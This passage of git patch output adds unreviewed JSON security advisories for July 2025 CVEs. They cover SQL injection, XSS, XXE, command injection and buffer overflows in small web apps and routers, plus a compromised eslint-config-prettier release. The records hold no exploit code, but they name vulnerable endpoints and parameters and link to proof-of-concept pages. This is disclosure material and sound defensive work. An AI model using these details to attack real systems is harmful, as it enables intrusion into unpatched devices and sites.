"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7829" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/5" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316933" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316933" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616884" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T14:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r5w5-2g3g-vrmq/GHSA-r5w5-2g3g-vrmq.json b/advisories/unreviewed/2025/07/GHSA-r5w5-2g3g-vrmq/GHSA-r5w5-2g3g-vrmq.json new file mode 100644 index 0000000000000..d7c150763f2b3 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-r5w5-2g3g-vrmq/GHSA-r5w5-2g3g-vrmq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5w5-2g3g-vrmq", + "modified": "2025-07-19T15:30:21Z", + "published": "2025-07-19T15:30:21Z", + "aliases": [ + "CVE-2025-7824" + ], + "details": "A vulnerability was found in Jinher OA 1.1. It has been rated as problematic. This issue affects some unknown processing of the file XmlHttp.aspx. The manipulation leads to xml external entity reference. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7824" + }, + { + "type": "WEB", + "url": "https://github.com/cc2024k/CVE/issues/2" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316925" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316925" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616842" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-610" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T13:15:24Z" + } +} \ No newline at end of file From e0b846b8f7bbc2417085cc6c69e99c8627d4c826 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 18:31:53 +0000 Subject: [PATCH 029/323] Publish Advisories GHSA-4rr4-44pw-9g2q GHSA-6fjr-vv6r-cjxg GHSA-f29h-pxvx-f335 GHSA-fwww-pvgq-792r GHSA-hqqj-w93q-qh72 GHSA-jj5h-f25w-8hv6 GHSA-qxfq-qf96-fww5 GHSA-v4j7-gxv2-mgg3 --- .../GHSA-4rr4-44pw-9g2q.json | 56 +++++++++++++++++ .../GHSA-6fjr-vv6r-cjxg.json | 56 +++++++++++++++++ .../GHSA-f29h-pxvx-f335.json | 60 +++++++++++++++++++ .../GHSA-fwww-pvgq-792r.json | 56 +++++++++++++++++ .../GHSA-hqqj-w93q-qh72.json | 56 +++++++++++++++++ .../GHSA-jj5h-f25w-8hv6.json | 56 +++++++++++++++++ .../GHSA-qxfq-qf96-fww5.json | 60 +++++++++++++++++++ .../GHSA-v4j7-gxv2-mgg3.json | 56 +++++++++++++++++ 8 files changed, 456 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-4rr4-44pw-9g2q/GHSA-4rr4-44pw-9g2q.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6fjr-vv6r-cjxg/GHSA-6fjr-vv6r-cjxg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f29h-pxvx-f335/GHSA-f29h-pxvx-f335.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fwww-pvgq-792r/GHSA-fwww-pvgq-792r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hqqj-w93q-qh72/GHSA-hqqj-w93q-qh72.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jj5h-f25w-8hv6/GHSA-jj5h-f25w-8hv6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qxfq-qf96-fww5/GHSA-qxfq-qf96-fww5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v4j7-gxv2-mgg3/GHSA-v4j7-gxv2-mgg3.json diff --git a/advisories/unreviewed/2025/07/GHSA-4rr4-44pw-9g2q/GHSA-4rr4-44pw-9g2q.json b/advisories/unreviewed/2025/07/GHSA-4rr4-44pw-9g2q/GHSA-4rr4-44pw-9g2q.json new file mode 100644 index 0000000000000..d038196c5adf1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4rr4-44pw-9g2q/GHSA-4rr4-44pw-9g2q.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rr4-44pw-9g2q", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-7833" + ], + "details": "A vulnerability, which was classified as critical, has been found in code-projects Church Donation System 1.0. This issue affects some unknown processing of the file /members/giving.php. The manipulation of the argument Amount leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7833" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/9" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316937" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316937" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616919" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T16:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6fjr-vv6r-cjxg/GHSA-6fjr-vv6r-cjxg.json b/advisories/unreviewed/2025/07/GHSA-6fjr-vv6r-cjxg/GHSA-6fjr-vv6r-cjxg.json new file mode 100644 index 0000000000000..497efc327b061 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6fjr-vv6r-cjxg/GHSA-6fjr-vv6r-cjxg.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fjr-vv6r-cjxg", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-7838" + ], + "details": "A vulnerability has been found in Campcodes Online Movie Theater Seat Reservation System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/manage_seat.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7838" + }, + { + "type": "WEB", + "url": "https://github.com/N1n3b9S/cve/issues/6" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.609491" + }, + { + "type": "WEB", + "url": "https://www.campcodes.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T18:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f29h-pxvx-f335/GHSA-f29h-pxvx-f335.json b/advisories/unreviewed/2025/07/GHSA-f29h-pxvx-f335/GHSA-f29h-pxvx-f335.json new file mode 100644 index 0000000000000..9879399203aef --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f29h-pxvx-f335/GHSA-f29h-pxvx-f335.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f29h-pxvx-f335", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-54313" + ], + "details": "eslint-config-prettier 8.10.1, 9.1.1, 10.1.6, and 10.1.7 has embedded malicious code for a supply chain compromise. Installing an affected package executes an install.js file that launches the node-gyp.dll malware on Windows.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54313" + }, + { + "type": "WEB", + "url": "https://github.com/prettier/eslint-config-prettier/issues/339" + }, + { + "type": "WEB", + "url": "https://news.ycombinator.com/item?id=44608811" + }, + { + "type": "WEB", + "url": "https://news.ycombinator.com/item?id=44609732" + }, + { + "type": "WEB", + "url": "https://socket.dev/blog/npm-phishing-campaign-leads-to-prettier-tooling-packages-compromise" + }, + { + "type": "WEB", + "url": "https://www.bleepingcomputer.com/news/security/popular-npm-linter-packages-hijacked-via-phishing-to-drop-malware" + }, + { + "type": "WEB", + "url": "https://www.npmjs.com/package/eslint-config-prettier?activeTab=versions" + }, + { + "type": "WEB", + "url": "https://www.stepsecurity.io/blog/supply-chain-security-alert-eslint-config-prettier-package-shows-signs-of-compromise" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-506" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T17:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fwww-pvgq-792r/GHSA-fwww-pvgq-792r.json b/advisories/unreviewed/2025/07/GHSA-fwww-pvgq-792r/GHSA-fwww-pvgq-792r.json new file mode 100644 index 0000000000000..0af8425655f3f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fwww-pvgq-792r/GHSA-fwww-pvgq-792r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwww-pvgq-792r", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-7836" + ], + "details": "A vulnerability has been found in D-Link DIR-816L up to 2.06B01 and classified as critical. Affected by this vulnerability is the function lxmldbc_system of the file /htdocs/cgibin of the component Environment Variable Handler. The manipulation leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7836" + }, + { + "type": "WEB", + "url": "https://github.com/bananashipsBBQ/CVE/blob/main/D-Link%20DIR-816L%20Remote%20Arbitrary%20Command%20Execution%20Vulnerability%20in%20ssdpcgi.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316939" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316939" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.617359" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T17:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hqqj-w93q-qh72/GHSA-hqqj-w93q-qh72.json b/advisories/unreviewed/2025/07/GHSA-hqqj-w93q-qh72/GHSA-hqqj-w93q-qh72.json new file mode 100644 index 0000000000000..d2cc5df77eb27 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hqqj-w93q-qh72/GHSA-hqqj-w93q-qh72.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hqqj-w93q-qh72", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-7834" + ], + "details": "A vulnerability, which was classified as problematic, was found in PHPGurukul Complaint Management System 2.0. Affected is an unknown function. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7834" + }, + { + "type": "WEB", + "url": "https://github.com/N1n3b9S/cve/issues/8" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316938" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316938" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T16:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jj5h-f25w-8hv6/GHSA-jj5h-f25w-8hv6.json b/advisories/unreviewed/2025/07/GHSA-jj5h-f25w-8hv6/GHSA-jj5h-f25w-8hv6.json new file mode 100644 index 0000000000000..6136f6654eaff --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jj5h-f25w-8hv6/GHSA-jj5h-f25w-8hv6.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jj5h-f25w-8hv6", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-7840" + ], + "details": "A vulnerability was found in Campcodes Online Movie Theater Seat Reservation System 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php?page=reserve of the component Reserve Your Seat Page. The manipulation of the argument Firstname/Lastname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7840" + }, + { + "type": "WEB", + "url": "https://github.com/N1n3b9S/cve/issues/9" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316941" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316941" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.617678" + }, + { + "type": "WEB", + "url": "https://www.campcodes.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T18:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qxfq-qf96-fww5/GHSA-qxfq-qf96-fww5.json b/advisories/unreviewed/2025/07/GHSA-qxfq-qf96-fww5/GHSA-qxfq-qf96-fww5.json new file mode 100644 index 0000000000000..cc5e95d015024 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qxfq-qf96-fww5/GHSA-qxfq-qf96-fww5.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxfq-qf96-fww5", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-7837" + ], + "details": "A vulnerability was found in TOTOLINK T6 4.1.5cu.748_B20211015 and classified as critical. Affected by this issue is the function recvSlaveStaInfo of the component MQTT Service. The manipulation of the argument dest leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7837" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/4.md" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/4.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316940" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316940" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.617572" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T17:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-v4j7-gxv2-mgg3/GHSA-v4j7-gxv2-mgg3.json b/advisories/unreviewed/2025/07/GHSA-v4j7-gxv2-mgg3/GHSA-v4j7-gxv2-mgg3.json new file mode 100644 index 0000000000000..e5f45a3ffe6bb --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v4j7-gxv2-mgg3/GHSA-v4j7-gxv2-mgg3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4j7-gxv2-mgg3", + "modified": "2025-07-19T18:30:33Z", + "published": "2025-07-19T18:30:33Z", + "aliases": [ + "CVE-2025-7832" + ], + "details": "A vulnerability classified as critical was found in code-projects Church Donation System 1.0. This vulnerability affects unknown code of the file /members/offering.php. The manipulation of the argument trcode leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7832" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/8" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316936" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316936" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616918" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T16:15:29Z" + } +} \ No newline at end of file From aa737070eeac35748ed5254f0f165cd8028114cf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 21:32:04 +0000 Subject: [PATCH 030/323] Publish Advisories GHSA-3w39-m5qw-fwfj GHSA-crg6-qwfp-vhgq GHSA-q3hm-79wj-v4h5 --- .../GHSA-3w39-m5qw-fwfj.json | 60 +++++++++++++++++++ .../GHSA-crg6-qwfp-vhgq.json | 60 +++++++++++++++++++ .../GHSA-q3hm-79wj-v4h5.json | 56 +++++++++++++++++ 3 files changed, 176 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-3w39-m5qw-fwfj/GHSA-3w39-m5qw-fwfj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-crg6-qwfp-vhgq/GHSA-crg6-qwfp-vhgq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q3hm-79wj-v4h5/GHSA-q3hm-79wj-v4h5.json diff --git a/advisories/unreviewed/2025/07/GHSA-3w39-m5qw-fwfj/GHSA-3w39-m5qw-fwfj.json b/advisories/unreviewed/2025/07/GHSA-3w39-m5qw-fwfj/GHSA-3w39-m5qw-fwfj.json new file mode 100644 index 0000000000000..f0cffe6d62a3f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3w39-m5qw-fwfj/GHSA-3w39-m5qw-fwfj.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w39-m5qw-fwfj", + "modified": "2025-07-19T21:30:25Z", + "published": "2025-07-19T21:30:25Z", + "aliases": [ + "CVE-2025-7853" + ], + "details": "A vulnerability was found in Tenda FH451 1.0.0.9. It has been rated as critical. This issue affects the function fromSetIpBind of the file /goform/SetIpBind. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7853" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromSetIpBind.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromSetIpBind.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316943" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316943" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616359" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T20:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-crg6-qwfp-vhgq/GHSA-crg6-qwfp-vhgq.json b/advisories/unreviewed/2025/07/GHSA-crg6-qwfp-vhgq/GHSA-crg6-qwfp-vhgq.json new file mode 100644 index 0000000000000..bc8a3e2a57bf8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-crg6-qwfp-vhgq/GHSA-crg6-qwfp-vhgq.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crg6-qwfp-vhgq", + "modified": "2025-07-19T21:30:25Z", + "published": "2025-07-19T21:30:25Z", + "aliases": [ + "CVE-2025-7854" + ], + "details": "A vulnerability classified as critical has been found in Tenda FH451 1.0.0.9. Affected is the function fromVirtualSer of the file /goform/VirtualSer. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7854" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromVirtualSer.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromVirtualSer.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316944" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316944" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616366" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T21:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q3hm-79wj-v4h5/GHSA-q3hm-79wj-v4h5.json b/advisories/unreviewed/2025/07/GHSA-q3hm-79wj-v4h5/GHSA-q3hm-79wj-v4h5.json new file mode 100644 index 0000000000000..81ceb182094c2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q3hm-79wj-v4h5/GHSA-q3hm-79wj-v4h5.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3hm-79wj-v4h5", + "modified": "2025-07-19T21:30:25Z", + "published": "2025-07-19T21:30:25Z", + "aliases": [ + "CVE-2025-7855" + ], + "details": "A vulnerability classified as critical was found in Tenda FH451 1.0.0.9. Affected by this vulnerability is the function fromqossetting of the file /goform/qossetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack can be launched remotely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7855" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromqossetting.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316945" + }, + { + "type": "WEB", + "url": 